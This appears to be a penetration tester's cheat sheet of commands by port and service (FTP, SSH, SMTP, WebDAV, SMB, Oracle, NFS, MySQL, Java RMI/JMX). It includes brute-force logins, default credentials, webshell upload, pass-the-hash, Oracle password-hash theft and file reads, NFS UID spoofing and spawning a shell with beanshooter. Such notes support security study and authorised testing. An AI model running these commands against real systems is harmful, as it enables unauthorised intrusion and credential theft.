# Login
ftp <ip>
# Anonymous login: after login use these creds [User:password]
anonymous:anonymous
anonymous:
ftp:ftp
# Anonymous login with nmap
nmap --script=ftp-anon -p21 <ip>
nmap -sC -sV -p21 <ip> # [better] ftp-anon is a default script
# Brute force login
hydra -L users.txt -P passwords.txt <ip> ftp
Search exploit for vulnerable version
22 - SSH
# Login with password
ssh <username>@<ip> # then type password
# Login with private key
ssh -i id_rsa <username>@<ip> # If private_key has passphrase you need to type it
# Crack passphrase
python ssh2john.py id_rsa > id_rsa.hash
john id_rsa.hash -wordlist=<wordlist>
# Brute force login
hydra -L users.txt -P passwords.txt <ip> ssh
If login with private key fails and you're asked for your user password, check for some errors (-vv option). Make sure that the public key is added in the authorized_keys file.
25 - SMTP
Search exploit for vulnerable version
Retrieve the hostname of the server (domain name)
francesco@debian:~$ nc <ip> <port>
220 openmailbox.xyz ESMTP Postfix: Welcome. # Here (in the banner)
helo whatyouwant # helo command
250 openmailbox.xyz # Here
Username Bruteforce
Automation:
smtp-user-enum -U <wordlist> -t <ip>
Manual
francesco@debian:~$ nc <ip> <port>
220 openmailbox.xyz ESMTP Postfix: Welcome.
VRFY root
252 2.0.0 root # Output if user exists
VRFY idontexists
550 5.1.1 <idontexists>: Recipient address rejected: User unknown in local recipient table
Note: there are other command you can use such as RCPT TO.
80 - WebDav
With WebDav you can upload file. Normally it's necessary credentials
# 1 tool - davtest
# Check what file type is executed
davtest -auth <user>:<password> -url http://<ip>/<webdav_path>
# Upload file
davtest --url http://<ip>/<webdav_path> -auth <user>:<password> -uploadfile webshell.asp -uploadloc /destination/webshell.asp
# 2 tool - cadaver
cadaver http://<ip>/<webdav_path> # then login.
# Use PUT command to upload file
139/445 - SMB | Samba
# List shared folders
smbclient --no-pass -L //<ip> # Null user
smbclient -U 'admin%pwd' -L //<ip> # (1) With credential
smbclient -U 'admin' -L //<ip> # (2) With credential [pwd omitted, then type it]
smbclient -U 'admin' --pw-nt-hash <hash> -L //<ip> # With hash (pass the hash)
# Obtain information (you can also enumerate users)
enum4linux -a [-u "<username>" -p "<passwd>"] <ip>
# Command execution (authenticated)
smbmap -H <ip> -u <user> -p <pass> -x 'ipconfig'
python3 psexec.py Administrator@ip # Even exploit/windows/smb/psexec metasploit module
Brute force login
Search exploit for vulnerable version
If v1 is enabled - EternalBlue exploit (check with nmap -> smb-protocols)
1521 - ORACLE DB (TNS protocol)
Introduction
Oracle clients communicate with the database using the TNS protocol
In Oracle DB a SID is specific to a database, it is unique in an environment and 'points' to one, and only one, database in an environment. A service name can be associated with one or more SIDs.
In a RAC environment where each instance is uniquely named yet all can be accessed through the SERVICE_NAME. [Oracle Real Application Cluster (RAC) is a "share-everything" database architecture in which two or more Oracle RAC nodes are clustered together and share the same memory]
SID SERVICE_NAME
test1 test
test2 test
All of those SIDs can be associated with the SERVICE_NAME test, and if load balancing is configured, the listener will 'balance' the workload across all SIDs. However, if you want, you can connect to test1, you just need to NOT use the SERVICE_NAME and use the SID.
[CVE-2012-3137] You need a valid SID and Oracle DB version is one of this (10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, 11.2.0.3) you can obtain the session key and salt for arbitrary users.
# enumerate database
odat search -s <ip> -d <SID> -p <port> -U <username> -P <password> --basic-info
# open sql shell
odat search -s <ip> -d <SID> -p <port> -U <username> -P <password> --sql-shell
# get hashed password when the account is not locked
odat passwordstealer -s <IP> -d <SID> -p <port> -U mobius -P <password> --get-passwords-not-locked
# read file (ex. ssh private key)
odat externaltable -s <IP> -d <SID> -p <port> -U mobius -P <password> --getFile /etc passwd passwd
# create file with cve-2018-3004 (ex. upload authorized key)
odat cve -s <IP> -d <SID> -p <port> -U mobius -P <password> --cve-2018-3004 /tmp/test "test"
# NOTE: there are many other things and techniques you can use with odat. Refer to the documentation
2049 - NFS
# Folder available to mount
showmount -e <ip>
# Mount
mount -t nfs <ip>:/test /mnt/folder
# Umount
umount /mnt/folder
# If you can't read/write inside the folder, you can create/modify uid of a user
### ls -lna /mnt/folder
### drwxrwxr-x 6 777 1 4096 Jan 7 2018 QWERTY
# 1 method
useradd newuser
usermod -u 6 newuser
## 2 method
nano /etc/passwd # edit uid
# Note if it doesn't work, umount, edit uid, mount again
3306 - MYSQL
# Local without pass
mysql -u root
# Local with pass
mysql -u root -p
# Remote without pass
mysql -h <hostname> -u root
# Remote with pass
mysql -h <hostname> -u root -p
Tip: If you are not sure that specific port runs rdp you can check with auxiliary/scanner/rdp/rdp_scanner or try to connect with xfreerdp
5985,5986 - WinRM
Brute force login
Java RMI
# Tool: https://github.com/qtc-de/remote-method-guesser
rmg enum <ip> <port>
# Note: there are many other things and techniques you can use with rmg. Refer to the documentation
JMXRMI
# Find JMX port
nmap -sC -sV -p 45000 <ip>
[...]
PORT STATE SERVICE VERSION
45000/tcp open java-rmi Java RMI
| rmi-dumpregistry:
| jmxrmi
[...]
TESTING
# Tool: https://github.com/qtc-de/beanshooter
# jconsole (/usr/lib/jvm/java-xxxxxx-openjdk-amd64/bin/jconsole)
# (Some jdk doesn't include jconsole)
# Check credentials
jconsole # connect <hostname>:<port>. [without credentials]
# Enumerate configuration
beanshooter enum <ip> <jmx_port>
# The best way to get a shell is with tonka
# Creating a TemplateImpl payload object to abuse StandardMBean
beanshooter standard <ip> <jmx_port> tonka
# Spawns a shell. NOTE: this works even if the target host doesn't reach you
beanshooter tonka shell <ip> <jmx_port>
# Note: there are many other things and techniques you can use with beanshooter. Refer to the documentation
Beanshooter Tips
If your local Java version is higher than the Java version of the application server, the server cannot load the bytecode and throws an exception.
How to know what java version the server is running? Connect with jconsole, then go to "VM Summary", find "VM Arguments" and search "Boot class path".
Install with maven
My installation method (sdkman)
# https://sdkman.io/install
# 1 - Install sdkman
curl -s "https://get.sdkman.io" | bash
source "$HOME/.sdkman/bin/sdkman-init.sh"
sdk version
# 2 - Install jdk (ex. java 8) [choose based on the taget]
sdk install java 8.0.275.hs-adpt
# 3 - Install maven
sdk install maven
# 4 - Check installation
mvn -v
Apache Maven 3.9.8
Java version: 1.8.0_275, vendor: AdoptOpenJDK, runtime: /home/kali/.sdkman/candidates/java/8.0.275.hs-adpt/jre
# 5 - Now you can install beanshooter
Other ports
Most of the services identified by the Nmap scan are easily recognizable, however, it's possibile that there are a few open ports on a target system that do not have a service banner. To learn more about these port and the service running, we can perform banner grabbing with Netcat
